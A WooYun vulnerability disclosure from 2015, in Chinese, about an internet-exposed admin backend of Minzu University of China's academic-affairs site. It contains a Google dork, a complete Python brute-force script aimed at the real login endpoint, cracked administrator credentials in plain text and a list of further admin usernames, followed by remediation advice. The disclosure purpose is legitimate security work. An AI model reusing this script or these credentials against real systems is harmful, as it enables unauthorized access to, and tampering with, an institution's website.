当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0107566

漏洞标题:中央民族大学某站后台管理权限对外开放

相关厂商:中央民族大学

漏洞作者: 大毛

提交时间:2015-04-14 17:32

修复时间:2015-04-20 14:22

公开时间:2015-04-20 14:22

漏洞类型:账户体系控制不严

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(CCERT教育网应急响应组)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-04-14: 细节已通知厂商并且等待厂商处理中
2015-04-20: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

今日,给LP演示搞安全人的作用,就拿她的母校试了一下,没想到随便一搞就发现了很多问题。
1、网站管理后台对外开放
2、后台登录无验证码限制且尝试次数不限,适合爆破
3、多个管理员存在弱口令,均可极速破解
4、登陆后拥有整个教务处网站的管理权限,可发公告、网站信息、可删除信息,可获得所有管理员名称,可以进一步爆破

详细说明:

1、谷歌 搜索:site:muc.edu.cn intitle:后台登录
发现教务处信息管理系统--后台登录

0.png


2、发现登录无验证码等限制,用fiddler抓管理员登录数据包,分析

fidd.png


3、对比2个登录数据包请求除了包的大小和用户名口令,其他都一样,且登录失败时,时响应包大小一样
4、写脚本,猜用户名密码,一会就猜出来as:123456

#!/usr/bin/env python
#conding=utf-8
#author:daMao
import httplib
conn = None
namelist = open('jwc.txt','r').readlines()
passlist = open('1pass00.txt','r')
for i in range(len(namelist)):
    namelist[i] = namelist[i].strip('\n')
#for j in range(len(passlist)):
#    passlist[j] = passlist[j].strip('\n')
resfile = open('resjwc.txt','a')
head = {'Host':' jw.muc.edu.cn',\
'User-Agent':' Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0',\
'Accept':' text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',\
'Accept-Language':' zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3',\
'Accept-Encoding':' gzip, deflate',\
'Cookie':' ASPSESSIONIDQCTCSTQD=MOFLLCBBLMFMJJAELNCKECEG',\
'Connection':' keep-alive',\
'Content-Type':' application/x-www-form-urlencoded',\
'Content-Length': None}
conn = httplib.HTTPConnection('jw.muc.edu.cn',80)
for pas in passlist:
    pas = pas.strip()
    for name in namelist:
        data = 'jwc_admin_name=' + name + '&jwc_admin_pwd=' + pas +'&denglu=%B5%C7%C2%BD'
        print data
        leng = str(len(data))
        head['Content-Length'] = leng
        conn.request('POST','/jwc/admin/jwc_FindAccount.asp',data,head)
        response = conn.getresponse()
        reslen = response.getheader('content-length')
        read = response.read()
        print reslen
        if reslen != "768":
            res = name + ':' + pas + '\n'
            print res
            resfile.write(res)
            resfile.flush()
            namelist.remove(name)
            print namelist
            break   
resfile.close()
passlist.close()
if conn:
    conn.close()


5、登录后台,有管理员权限,新建公告和信息等,并删除新建内容。
注意:因为是ASP的后台,很老,只能用IE6登录才可以添加,其他的浏览器都不支持!!!!
6、发现其他管理员发布信息的用户名,用收集到的管理原用户名再次猜解,一会有得到2个管理员帐号。
vand:1234
jwclaq:123456

漏洞证明:

1、新建公告

3.png


2、页面访问可看到

2.png


3、新建信息

6.png


4、前台访问页面可看到

8.png


5、可全选,删除所有的信息(我没删)

9.png


6、获得的管理员用户名列表,猜解了前3个,其余就不跑了。
as:123456
jwclaq:123456
vand:1234
jwcyjm
jwcpyh
jwcmyj
zy
mms
zhmsong
kszx
link
admin
sjjx

修复方案:

1、后台管理页面不对外开放,可限制访问源
2、后台登录加验证码等防护机制,或限制管理员口令猜解次数
3、加强密码复杂度,也太简单了

版权声明:转载请注明来源 大毛@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-04-20 14:22

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

暂无